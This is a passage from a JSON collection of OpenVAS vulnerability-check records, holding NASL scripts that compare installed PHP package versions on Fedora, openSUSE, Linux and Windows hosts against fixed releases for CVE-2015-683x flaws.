script_oid(\"1.3.6.1.4.1.25623.1.0.869939\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-07 18:42:25 +0530 (Wed, 07 Oct 2015)\");\n script_cve_id(\"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-6834\", \"CVE-2015-6836\",\n \"CVE-2015-6835\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for php FEDORA-2015-14976\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"php on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-14976\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166337.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.6.13~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-07T00:00:00", "type": "openvas", "title": "Fedora Update for php FEDORA-2015-14977", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869941", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869941", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2015-14977\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869941\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-07 18:40:12 +0530 (Wed, 07 Oct 2015)\");\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6836\", \"CVE-2015-6835\", \"CVE-2015-6837\",\n \"CVE-2015-6838\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for php FEDORA-2015-14977\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"php on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-14977\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166357.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.6.13~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:56", "description": "This host is installed with PHP and is prone\n to Directory traversal vulnerability.", "cvss3": {}, "published": "2016-07-14T00:00:00", "type": "openvas", "title": "PHP Directory Traversal Vulnerability - Jul16 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310808617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808617", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_dir_traversal_vuln_lin.nasl 14181 2019-03-14 12:59:41Z cfischer $\n#\n# PHP Directory Traversal Vulnerability - Jul16 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808617\");\n script_version(\"$Revision: 14181 $\");\n script_cve_id(\"CVE-2014-9767\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6837\",\n \"CVE-2015-6838\");\n script_bugtraq_id(76652, 76649, 76733, 76734, 76738);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:59:41 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-14 12:14:00 +0530 (Thu, 14 Jul 2016)\");\n script_name(\"PHP Directory Traversal Vulnerability - Jul16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to Directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - An error in the 'ZipArchive::extractTo' function in\n 'ext/zip/php_zip.c' script.\n\n - The xsl_ext_function_php function in ext/xsl/xsltprocessor.c when libxml2\n is used, does not consider the possibility of a NULL valuePop return value\n before proceeding with a free operation after the principal argument loop.\n\n - Improper handling of multiple php_var_unserialize calls.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow remote\n attackers to read arbitrary empty directories, also to cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"PHP versions prior to 5.4.45, 5.5.x before\n 5.5.29, and 5.6.x before 5.6.13 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.4.45, or 5.5.29,\n or 5.6.13, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/03/16/20\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less(version:phpVer, test_version:\"5.4.45\"))\n{\n fix = '5.4.45';\n VULN = TRUE;\n}\n\nelse if(phpVer =~ \"^5\\.5\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.5.0\", test_version2:\"5.5.28\"))\n {\n fix = '5.5.29';\n VULN = TRUE;\n }\n}\n\nelse if(phpVer =~ \"^5\\.6\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.6.0\", test_version2:\"5.6.12\"))\n {\n fix = '5.6.13';\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:fix);\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:35", "description": "This host is installed with PHP and is prone\n to Directory traversal vulnerability.", "cvss3": {}, "published": "2016-07-14T00:00:00", "type": "openvas", "title": "PHP Directory Traversal Vulnerability - Jul16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2018-10-17T00:00:00", "id": "OPENVAS:1361412562310808616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808616", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_dir_traversal_vuln_win.nasl 11938 2018-10-17 10:08:39Z asteins $\n#\n# PHP Directory Traversal Vulnerability - Jul16 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808616\");\n script_version(\"$Revision: 11938 $\");\n script_cve_id(\"CVE-2014-9767\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6837\",\n \"CVE-2015-6838\");\n script_bugtraq_id(76652, 76649, 76733, 76734, 76738);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-17 12:08:39 +0200 (Wed, 17 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-14 12:14:00 +0530 (Thu, 14 Jul 2016)\");\n script_name(\"PHP Directory Traversal Vulnerability - Jul16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to Directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - An error in the 'ZipArchive::extractTo' function in\n 'ext/zip/php_zip.c' script.\n\n - The xsl_ext_function_php function in ext/xsl/xsltprocessor.c when libxml2\n is used, does not consider the possibility of a NULL valuePop return value\n before proceeding with a free operation after the principal argument loop.\n\n - Improper handling of multiple php_var_unserialize calls.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow remote\n attackers to read arbitrary empty directories, also to cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"PHP versions prior to 5.4.45, 5.5.x before\n 5.5.29, and 5.6.x before 5.6.13 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.4.45, or 5.5.29,\n or 5.6.13, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/03/16/20\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less(version:phpVer, test_version:\"5.4.45\"))\n{\n fix = '5.4.45';\n VULN = TRUE;\n}\n\nelse if(phpVer =~ \"^5\\.5\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.5.0\", test_version2:\"5.5.28\"))\n {\n fix = '5.5.29';\n VULN = TRUE;\n }\n}\n\nelse if(phpVer =~ \"^5\\.6\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.6.0\", test_version2:\"5.6.12\"))\n {\n fix = '5.6.13';\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:fix);\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:37:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-09-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for php5 (openSUSE-SU-2015:1628-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6832", "CVE-2015-6838"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850689", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850689", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850689\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-26 07:59:56 +0200 (Sat, 26 Sep 2015)\");\n script_cve_id(\"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for php5 (openSUSE-SU-2015:1628-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php5'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The PHP5 script interpreter was updated to fix various security issues:\n\n * CVE-2015-6831: A use after free vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#942291] [bnc#942294] [bnc#942295]\n\n * CVE-2015-6832: A dangling pointer in the unserialization of ArrayObject\n items could be used to crash php or potentially execute code.\n [bnc#942293]\n\n * CVE-2015-6833: A directory traversal when extracting ZIP files could be\n used to overwrite files outside of intended area. [bnc#942296]\n\n * CVE-2015-6834: A Use After Free Vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#945403]\n\n * CVE-2015-6835: A Use After Free Vulnerability in session unserialize()\n has been fixed which could be used to crash php or potentially execute\n code. [bnc#945402]\n\n * CVE-2015-6836: A SOAP serialize_function_call() type confusion leading\n to remote code execution problem was fixed. [bnc#945428]\n\n * CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the\n XSLTProcessor class were fixed. [bnc#945412]\");\n\n script_tag(name:\"affected\", value:\"php5 on openSUSE 13.2, openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:1628-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE13\\.2|openSUSE13\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5-debuginfo\", rpm:\"apache2-mod_php5-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath-debuginfo\", rpm:\"php5-bcmath-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2-debuginfo\", rpm:\"php5-bz2-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar-debuginfo\", rpm:\"php5-calendar-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype-debuginfo\", rpm:\"php5-ctype-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl-debuginfo\", rpm:\"php5-curl-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba-debuginfo\", rpm:\"php5-dba-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debuginfo\", rpm:\"php5-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debugsource\", rpm:\"php5-debugsource~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom-debuginfo\", rpm:\"php5-dom-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant\", rpm:\"php5-enchant~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant-debuginfo\", rpm:\"php5-enchant-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif-debuginfo\", rpm:\"php5-exif-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi-debuginfo\", rpm:\"php5-fastcgi-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo\", rpm:\"php5-fileinfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo-debuginfo\", rpm:\"php5-fileinfo-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird\", rpm:\"php5-firebird~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird-debuginfo\", rpm:\"php5-firebird-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm\", rpm:\"php5-fpm~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm-debuginfo\", rpm:\"php5-fpm-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp-debuginfo\", rpm:\"php5-ftp-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd-debuginfo\", rpm:\"php5-gd-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext-debuginfo\", rpm:\"php5-gettext-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp-debuginfo\", rpm:\"php5-gmp-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv-debuginfo\", rpm:\"php5-iconv-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap-debuginfo\", rpm:\"php5-imap-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl\", rpm:\"php5-intl~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl-debuginfo\", rpm:\"php5-intl-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json-debuginfo\", rpm:\"php5-json-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap-debuginfo\", rpm:\"php5-ldap-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring-debuginfo\", rpm:\"php5-mbstring-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt-debuginfo\", rpm:\"php5-mcrypt-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql\", rpm:\"php5-mssql~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql-debuginfo\", 